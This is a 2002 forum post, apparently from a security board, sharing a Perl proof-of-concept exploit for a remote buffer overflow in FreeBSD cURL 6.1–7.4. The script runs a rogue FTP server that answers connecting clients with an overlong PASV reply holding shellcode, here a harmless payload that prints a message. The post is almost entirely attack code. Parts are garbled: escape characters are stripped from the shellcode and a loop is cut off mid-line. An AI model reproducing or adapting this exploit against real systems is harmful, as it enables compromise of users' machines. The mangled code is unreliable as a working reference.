-
May 9th, 2002, 07:29 AM
#1
Exploit: Remote FreeBSD cURL versions 6.1 - 7.4
Here is some PoC code for the recent cURL overflows. (FBSD version)
exploits will also be posted at http://www.snosoft.com/research/
#!/usr/bin/perl
#
# Remote FreeBSD cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
#
# This exploit may only be used for testing purposes. More information
# about the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Ha! Owned by a cURL!" to stdout on the system
# running cURL. The extra nops are needed because the buffer, which causes
# the overflow, is altered.
#
# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
# Ha! Owned by a cURL!
use IO::Socket;
use Net::hostent;
########################################################################
$shellcode =
"xebx14x5ex31xc0x6ax14x56x40x40x50xb0x04x50xcd".
"x80x31xc0x40x50xcdx80xe8xe7xffxffxffx48x61x21".
"x20x4fx77x6ex65x64x20x62x79x20x61x20x63x55x52".
"x4cx21x23".
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";
while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}
$id = `id -u`; chop($id);
$size = 225;
$esp = 0xbfbffbd4;
$offset = -140 unless $offset;
$port = 21 unless $port;
if(!$list || $port > 1024 && $id != 0) {
print
Option: $0 -o
Note: low ports require root privileges
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
TWENTE
exit;
}
for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!n" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]n", $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.n";
print $cl "230 Okn";
print $cl "227 $buffern";
sleep 2;
}
Source: http://www.xatrix.org/article1459.html
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|